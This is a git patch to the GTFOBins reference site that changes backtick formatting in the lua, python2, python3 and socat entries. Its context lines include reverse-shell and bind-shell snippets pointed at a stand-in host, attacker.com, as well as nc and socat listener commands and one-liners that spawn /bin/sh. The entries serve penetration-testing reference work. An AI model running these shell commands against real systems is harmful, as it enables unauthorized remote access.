From 4de02469926e7eb400bf29baafb4053523c737cd Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Sun, 22 Jul 2018 15:22:03 +0100 Subject: [PATCH] Use double backtick for inline code --- _gtfobins/lua.md | 2 +- _gtfobins/python2.md | 2 +- _gtfobins/python3.md | 2 +- _gtfobins/socat.md | 4 ++-- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index 7e4d9a1..4830413 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -3,7 +3,7 @@ functions: execute-interactive: - code: lua -e 'os.execute("/bin/sh")' reverse-shell-non-interactive: - - description: Run nc -l -p 12345 on the attacker box to receive the shell. This requires `lua-socket` installed. + - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index 6f7aa79..28c27e6 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -3,7 +3,7 @@ functions: execute-interactive: - code: python2 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 469a231..960d00c 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -3,7 +3,7 @@ functions: execute-interactive: - code: python3 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 2e84b46..9ea1c3e 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -1,13 +1,13 @@ --- functions: reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane bind-shell-interactive: - - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. + - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. code: | LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane